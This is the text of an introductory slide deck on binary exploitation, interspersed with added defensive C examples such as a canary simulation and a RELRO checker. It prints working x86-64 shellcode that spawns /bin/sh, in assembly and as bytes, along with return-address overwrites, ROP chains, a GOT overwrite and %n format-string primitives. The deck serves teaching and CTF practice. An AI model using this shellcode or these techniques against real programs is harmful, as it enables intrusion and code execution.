[DSC] Introduction to Binary Exploitation
Proprietary
Carl Svensson, 2020-01-28
An Introduction to Binary Exploitation
Biography
● MSc in Computer Science, KTH
● Security Engineer @ Google - Offensive Security
● CTF Player: HackingForSoju
● Email: zetatwo@google.com / Twitter: @zetatwo
Agenda
● Background
● Stack-based exploitation
● Protections and bypasses
● Heap-based exploitation
● Next steps
Background
Who Are You?
● Programmer
● Security interested
● Basic knowledge of some low-level language, e.g. C or C++
● Basic understanding of operating systems
What is an Exploit?
● Unintended behaviour
● State machine
  ○ Initial state
  ○ Reachable state
  ○ Invalid state
● Vulnerability
  ○ Unintended transition (bug)
  ○ Enabling an exploit
● Exploit
  ○ Transition to an invalid state
  ○ "Dangerous" subset
A Note on Data
● We organize bits into groups - nibble, byte, word, dword, qword
● Bits are interpreted as integers, text, code, addresses, etc.
● Same data, different interpretations - context determines
● Remember endianness - little vs big

The bytes 0x41 0x42 0x43 0x44, read four ways:
  as integers:  65, 66, 67, 68
  as text:      "ABCD"
  as x86 code:  inc ecx; inc edx; inc ebx; inc esp
  as a dword:   0x44434241 = 1145258561

Little: 0x44332211 = 0x11 0x22 0x33 0x44
Big:    0x44332211 = 0x44 0x33 0x22 0x11
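As an added illustration (not from the slides), the interpretations above carried out in C with explicit byte-order loads and stores, so the same four bytes are read as text, as a little-endian dword and as a big-endian dword; SAMPLE is the constructed input 65 66 67 68, and the function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Read four bytes as a 32-bit integer, least significant byte first (x86). */
uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Read the same four bytes most significant byte first (network order). */
uint32_t load_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* Write v to out[0..3] in little-endian (le != 0) or big-endian byte order. */
void store32(unsigned char *out, uint32_t v, int le)
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)(v >> (le ? 8 * i : 8 * (3 - i)));
}

/* Reading little-endian bytes in big-endian order reverses them. */
uint32_t byteswap32(uint32_t v)
{
    unsigned char tmp[4];
    store32(tmp, v, 1);
    return load_be32(tmp);
}

/* The slide's sample bytes 65 66 67 68, constructed here. */
static const unsigned char SAMPLE[4] = { 65, 66, 67, 68 };

int main(void)
{
    char text[5] = { 0 };
    memcpy(text, SAMPLE, 4);                    /* as text: "ABCD" */
    uint32_t dword = load_le32(SAMPLE);         /* as a dword: 0x44434241 */
    printf("text %s, dword 0x%08X = %u\n", text, dword, dword);
    unsigned char le[4], be[4];
    store32(le, 0x44332211u, 1);                /* 11 22 33 44 */
    store32(be, 0x44332211u, 0);                /* 44 33 22 11 */
    printf("little: %02X %02X %02X %02X\n", le[0], le[1], le[2], le[3]);
    printf("big:    %02X %02X %02X %02X\n", be[0], be[1], be[2], be[3]);
    return 0;
}
```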
Where are We?
● Physics - Maxwell’s equations
● Circuits - Gates, flip-flops, wires
● Micro-architecture - Internals of CPU
● Machine code - Assembly translated to bytes
● Low-level code - C, Rust
● Mid-level code - Java, C#
● High-level code - Python, Javascript
x86 Basics
x86 Memory
● Virtual memory
● Stack
● Heap
● Code - Text
x86 Registers
● General purpose
  ○ RAX, RBX, RCX, RDX
  ○ RDI, RSI, R8, R9
● Special purpose
  ○ RIP, RBP, RSP
● ...and a few hundred more
x86 Calling convention
● Architecture specific
● x86, 32 bit, 64 bit
● Arguments
  ○ 32 bit: stack in reverse order
  ○ 64 bit: first few in registers
● Stack frame - base pointer

                  32 bit                          64 bit
call              call 0xCAFEC0DE                 call rip+0x1337
  equivalent to   push eip+5; jmp 0xCAFEC0DE      push rip+5; jmp rip+0x1337
ret               pop eip                         pop rip
f(a, b)           push b; push a; call f          mov rdi, a; mov rsi, b; call f
Stack-based Exploits
Stack buffer overflow
● Unchecked write
● Overwrite adjacent memory
● Overwrite return address

void vuln() {
    long local1;
    char buf[16];
    fgets(buf, 256, stdin); // up to 255 bytes written into a 16-byte buffer
}

Program received signal SIGSEGV, Segmentation fault.
0x4B4B4B4B4A4A4A4A in example1 ()

[buf (16 bytes)]             [AAAABBBBCCCCDDDD]
[local1 (8 bytes)]           [EEEEFFFF]
[saved bp (8 bytes)]         [GGGGHHHH]
[return address (8 bytes)]   [JJJJKKKK]
Shellcode
● Code that launches a shell
● Can also do other things
● Mostly written in C or ASM
● Needs to be location independent

xor rdx, rdx
mov qword rbx, '//bin/sh'
shr rbx, 0x8
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
syscall

Assembled bytes:
0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f
0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7
0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05
Stack buffer overflow ('96)
● No protections present
● No longer viable
● A simple attack
  ○ Inject code
  ○ Overwrite return address with shellcode location

void vuln() {
    long local1;
    char buf[16];
    fgets(buf, 256, stdin); // up to 255 bytes written into a 16-byte buffer
}

$ uname -a
Linux pwnbox 5.4.0-12.15-generic...

0x00007FFFDEADC0DE:
[buf (16 bytes)]             [0x48 0x31 0xd2 0x48 ...]
[local1 (8 bytes)]           [...]
[saved bp (8 bytes)]         [... 0x3b 0x0f 0x05]
[return address (8 bytes)]   [0x00007FFFDEADC0DE]
Shellcode placement
● Shellcode can be moved around
● For example further down the stack
● If exact location is unknown
  ○ NOP sled

void vuln() {
    long local1;
    char buf[12];
    fgets(buf, 256, stdin); // up to 255 bytes written into a 12-byte buffer
}

$ uname -a
Linux pwnbox 5.4.0-12.15-generic...

0x00007FFFDEADC0DE:
[buf (12 bytes)]             [...]
[local1 (8 bytes)]           [...]
[saved bp (8 bytes)]         [...]
[return address (8 bytes)]   [0x00007FFFDEADC102]
[prev frame (? bytes)]       [0x48 0x31 0xd2 …]
Protection: ASLR ('01)
● Address Space Layout Randomization
● Randomize location of stack and heap
  ○ 32 bit: 12 bit entropy
  ○ 64 bit: 28 bit entropy
● So far code location still known
● Location of buffer now unknown
● Code reuse
  ○ Gadgets

Gadget in code at a known address:
0x00007FFFCAFECAFE:
    jmp rsp

$ uname -a
Linux pwnbox 5.4.0-12.15-generic...

0x????????:
[buf (16 bytes)]             [...]
[local1 (8 bytes)]           [...]
[saved bp (8 bytes)]         [...]
[return address (8 bytes)]   [0x00007FFFCAFECAFE]
[prev frame (? bytes)]       [0x48 0x31 0xd2 …]
Protection: NX/DEP ('97)
● Adds permission bits to memory
  ○ Code: RX
  ○ Heap+Stack: RW
● Shellcode on stack not possible
● Code location known
● Gadgets
  ○ Return-oriented programming

Gadgets in code (32 bit):
0x4000104A:          0x4000106A:
    ...                  ...
    pop eax              pop ebx
    ret                  pop ecx
                         ret

Stack after the overflow:
0x????????:
[AAAA...DDDD]
[EEEE]
[FFFF]
[0x4000104A]         return address -> pop eax; ret
[0xDEADBEEF]         popped into eax
[0x4000106A]         -> pop ebx; pop ecx; ret
[0xCAFEBABE]         popped into ebx
[0xFEEDF00D]         popped into ecx

eax = 0xDEADBEEF
ebx = 0xCAFEBABE
ecx = 0xFEEDF00D
Protection: StackGuard ('98)
● Catch the overflow before damage
● Canary - random secret value
● The crash becomes controlled
● Relies on canary being secret
  ○ Memory leak
  ○ Forking servers

void vuln() {
    long local1;
    char buf[12];
    fgets(buf, 256, stdin); // up to 255 bytes written into a 12-byte buffer
}

*** stack smashing detected ***: ./a.out terminated
======= Backtrace: =========

SECRET = ???
[buf (12 bytes)]             [...]
[local1 (8 bytes)]           [...]
[SECRET]                     [0x4141414141414141]
[saved bp (8 bytes)]         [0x4141414141414141]
[return address (8 bytes)]   [0x00007FFFDEADC0DE]

What the compiler effectively emits:
void vuln() {
    push_cookie();   // store the canary below the saved bp
    long local1;
    char buf[12];
    fgets(buf, 256, stdin);
    check_cookie();  // abort if the canary changed
}
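An added simulation, not from the slides, of the push_cookie()/check_cookie() pair on a constructed frame layout: struct frame and the run_* helpers are hypothetical stand-ins for what the compiler emits, and the secret is fixed rather than random. It shows that a write stopping inside local1 passes the check, while one that reaches the canary is detected before the return address is used.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the frame on the slide. The compiler places the
 * canary between the locals and the saved base pointer / return address. */
struct frame {
    char buf[16]; uint64_t local1;   /* what fgets() writes into, and a neighbour */
    uint64_t canary, saved_bp, ret;  /* canary sits just below the control data */
};

enum { FRAME_OK = 0, FRAME_SMASHED = 1, FRAME_REJECTED = 2 };

/* Simulate an unchecked write of n input bytes starting at buf, then the
 * epilogue check. The copy is bounded by sizeof(struct frame), so the model
 * itself never writes out of bounds. FRAME_SMASHED is where a real binary
 * calls __stack_chk_fail and aborts before the ret executes. */
int run_with_canary(const unsigned char *in, size_t n, uint64_t secret)
{
    struct frame f;
    if (n > sizeof f) return FRAME_REJECTED;
    memset(&f, 0, sizeof f);
    f.canary = secret;                 /* push_cookie() on the slide */
    f.saved_bp = 0x00007FFFDEADBEEFull;
    f.ret = 0x00007FFFDEADC0DEull;
    memcpy(&f, in, n);                 /* the unchecked write */
    return f.canary == secret ? FRAME_OK : FRAME_SMASHED; /* check_cookie() */
}

/* A write of n bytes of 'A' (constructed input). */
int run_fill(size_t n, uint64_t secret)
{
    unsigned char input[sizeof(struct frame)];
    memset(input, 'A', sizeof input);
    return run_with_canary(input, n, secret);
}

size_t canary_offset(void) { return offsetof(struct frame, canary); }

int main(void)
{
    /* glibc draws the canary at process start and keeps its lowest byte zero
     * so string copies stop there; a fixed value is used here for the demo. */
    const uint64_t secret = 0x1b2c3d4e5f607100ull;
    printf("16 bytes -> %d (buf only)\n", run_fill(16, secret));
    printf("24 bytes -> %d (local1 clobbered, canary intact)\n", run_fill(24, secret));
    printf("40 bytes -> %d (canary smashed)\n", run_fill(40, secret));
    return 0;
}
```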
GOT/PLT Overwrite
● Procedure Linkage Table, PLT
● Global Offset Table, GOT
● PLT contains stubs with jumps
● GOT contains addresses to libraries
● Overwrite GOT entry and call function

...
call printf@plt
...
printf@plt:
    jmp [printf@got]

Before:  printf@got: 0x7FFFC0DECAFE
After:   printf@got: 0x7FFFDEADDEAD
…
call printf@plt -> 0x7FFFDEADDEAD
...
Protection: RELRO
● RELocation Read Only, RELRO
● “Partial RELRO”
  ○ GOT before BSS
● Full RELRO
  ○ Actually read only
  ○ Handled by loader

...
call printf@plt
...
printf@plt:
    jmp [printf@got]

printf@got: 0x7FFFC0DECAFE   (read only)
printf@got: 0x7FFFDEADDEAD   (attempted write, no effect)
…
call printf@plt -> 0x7FFFC0DECAFE
...
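An added check, not from the slides, covering both the GOT overwrite slide and this one: classify a binary's RELRO level the way checksec reports it, by parsing the ELF64 program headers for PT_GNU_RELRO and the dynamic section for BIND_NOW, since Full RELRO is what removes the writable GOT. classify_relro and classify_sample are hypothetical names; the image is assumed to share the host's endianness, and classify_sample builds a constructed minimal image rather than reading a real binary.

```c
#include <elf.h>
#include <string.h>

enum relro_level { RELRO_NONE = 0, RELRO_PARTIAL = 1, RELRO_FULL = 2 };

/* Partial RELRO: a PT_GNU_RELRO segment exists but lazy binding leaves the GOT
 * writable. Full RELRO: BIND_NOW as well, so the loader resolves every GOT
 * entry up front and then maps it read-only. Returns -1 for a malformed image. */
int classify_relro(const unsigned char *img, size_t len)
{
    Elf64_Ehdr eh; if (len < sizeof eh) return -1;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) || eh.e_ident[EI_CLASS] != ELFCLASS64 ||
        eh.e_phentsize != sizeof(Elf64_Phdr)) return -1;
    int relro = 0, bind_now = 0;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf64_Phdr ph;
        size_t off = eh.e_phoff + (size_t)i * sizeof ph;
        if (off + sizeof ph > len) return -1;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_RELRO) relro = 1;
        if (ph.p_type != PT_DYNAMIC) continue;
        /* Walk the dynamic section: BIND_NOW has three spellings. */
        for (size_t d = ph.p_offset; d + sizeof(Elf64_Dyn) <= len &&
             d + sizeof(Elf64_Dyn) <= ph.p_offset + ph.p_filesz; d += sizeof(Elf64_Dyn)) {
            Elf64_Dyn dyn;
            memcpy(&dyn, img + d, sizeof dyn);
            if (dyn.d_tag == DT_NULL) break;
            if (dyn.d_tag == DT_BIND_NOW ||
                (dyn.d_tag == DT_FLAGS && (dyn.d_un.d_val & DF_BIND_NOW)) ||
                (dyn.d_tag == DT_FLAGS_1 && (dyn.d_un.d_val & DF_1_NOW))) bind_now = 1;
        }
    }
    return !relro ? RELRO_NONE : bind_now ? RELRO_FULL : RELRO_PARTIAL;
}

/* Constructed minimal image (header, two program headers, a two-entry dynamic
 * section) so the classifier can be exercised without a real binary. */
int classify_sample(int bind_now)
{
    Elf64_Ehdr eh = { 0 }; Elf64_Phdr ph[2] = { { 0 } }; Elf64_Dyn dyn[2] = { { 0 } };
    unsigned char img[sizeof eh + sizeof ph + sizeof dyn];
    memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_ident[EI_CLASS] = ELFCLASS64;
    eh.e_phoff = sizeof eh; eh.e_phentsize = sizeof(Elf64_Phdr); eh.e_phnum = 2;
    ph[0].p_type = PT_GNU_RELRO; ph[1].p_type = PT_DYNAMIC;
    ph[1].p_offset = sizeof eh + sizeof ph; ph[1].p_filesz = sizeof dyn;
    dyn[0].d_tag = DT_FLAGS; dyn[0].d_un.d_val = bind_now ? DF_BIND_NOW : 0;
    dyn[1].d_tag = DT_NULL;
    memcpy(img, &eh, sizeof eh); memcpy(img + sizeof eh, ph, sizeof ph);
    memcpy(img + sizeof eh + sizeof ph, dyn, sizeof dyn);
    return classify_relro(img, sizeof img);
}
```

On a real file, read it into memory and pass it to classify_relro; the link flags that produce the Full result are -Wl,-z,relro,-z,now.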
Base Pointer Overwrite
● Stack frames - linked list
● Misalign stack frame
  ○ Modify local variables
  ○ Modify stack pointer
● Partial overwrite
  ○ Shift stack frame
Protection: CFG ('14)
● Control Flow Guard
● Control Flow Integrity
● Intended to prevent code-reuse attacks
● Bypass example: JIT
Protection: PAC ('17)
● Pointer Authentication Code
● Reuse unused bits for MAC
● Hardware support
● ARM64, Apple iOS
● Bypass: signing oracle
  ○ Project Zero blog
Format String Vulnerability
● Calls to printf-like functions
● Control over first argument
● Variable number of arguments
● Read direct: %x/%d
● Read indirect: %s
● Write: %n
● Copy: %0*x, %n
● Skip: %4$x

int printf ( const char * format, ... );
printf("Name: %s, age: %d", name, age); // Ok
printf(name); // Vulnerable
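An added example, not from the slides: a small scanner that counts the conversions an untrusted string would trigger if it were ever passed as the format (the %x, %s, %n, %0*x and %4$x forms listed above), next to the safe call that passes the string as an argument. scan_format, skip_spec and print_name_safe are hypothetical names; the sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

/* What an untrusted string would do if it were used as the format. */
struct fmt_scan { int directives; int writes; int positional; };

/* Parse one conversion spec after '%' (flags, width, precision, length,
 * conversion). Returns the pointer past it, or NULL if it is not a conversion. */
static const char *skip_spec(const char *p, struct fmt_scan *r)
{
    const char *start = p;
    int pos = 0;
    while (*p >= '0' && *p <= '9') p++;                 /* %N$ positional index? */
    if (*p == '$') { pos = 1; p++; } else p = start;
    while (*p && strchr("-+ #0", *p)) p++;              /* flags */
    while ((*p >= '0' && *p <= '9') || *p == '*') p++;  /* width, incl. the * of %0*x */
    if (*p == '.') { p++; while ((*p >= '0' && *p <= '9') || *p == '*') p++; } /* precision */
    while (*p && strchr("hlLqjzt", *p)) p++;            /* length modifier */
    if (!*p || !strchr("diouxXeEfFgGaAcspn", *p)) return NULL;
    r->directives++;
    r->positional += pos;
    if (*p == 'n') r->writes++;                          /* %n writes through a pointer */
    return p + 1;
}

/* Count the conversions in s, skipping the literal "%%". */
struct fmt_scan scan_format(const char *s)
{
    struct fmt_scan r = { 0, 0, 0 };
    while (*s) {
        if (*s != '%') { s++; continue; }
        if (s[1] == '%') { s += 2; continue; }
        const char *next = skip_spec(s + 1, &r);
        s = next ? next : s + 1;
    }
    return r;
}

/* The fix from the slide: the untrusted string is an argument, never the format. */
int print_name_safe(const char *name) { return printf("%s\n", name); }

int main(void)
{
    const char *untrusted = "%4$x %0*x %n";  /* constructed sample input */
    struct fmt_scan r = scan_format(untrusted);
    printf("directives=%d writes=%d positional=%d\n", r.directives, r.writes, r.positional);
    return print_name_safe(untrusted) > 0 ? 0 : 1;
}
```

Compiling with -Wformat-security catches the printf(name) pattern statically; the scanner is for triaging strings seen at runtime or in logs.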
Heap-based Exploits
A Refresher on Memory
● Physical
● Virtual
● Pages
● Memory allocator
  ○ malloc/free
  ○ glibc
  ○ jemalloc
Heap corruption: app layer
● Heap overflow
● Use after free
● Type confusion
● Heap spraying
Heap corruption: allocator
● Corrupt allocator metadata
● Linked lists
● Requires understanding of allocator
  ○ Slabs
  ○ Bins
  ○ Cache
● glibc - House of X
Next Steps
Want to try it out?
Capture the Flag:
  https://capturetheflag.withgoogle.com
  https://ctftime.org
  https://picoctf.com
Wargames:
  https://github.com/zardus/wargame-nexus
  https://pwnable.kr
  https://overthewire.org
Community:
  CTF players Discord: https://discord.gg/ArjWjvctft
Further Materials
Videos:
  https://securitycreators.video
  https://www.youtube.com/GynvaelEN
  https://www.youtube.com/ZetaTwo
  https://www.youtube.com/LiveOverflow
Tools:
  Python + Pwntools
  gdb + gef
  IDA, Binary Ninja, Ghidra
Learning:
  https://pwn.college
  https://github.com/RPISEC/MBE
  https://github.com/shellphish/how2heap
Interested in Google?
Internships and full-time positions:
  https://careers.google.com/students
Questions about working at Google, specifically security:
  Email zetatwo@google.com or Twitter @zetatwo
Thank You
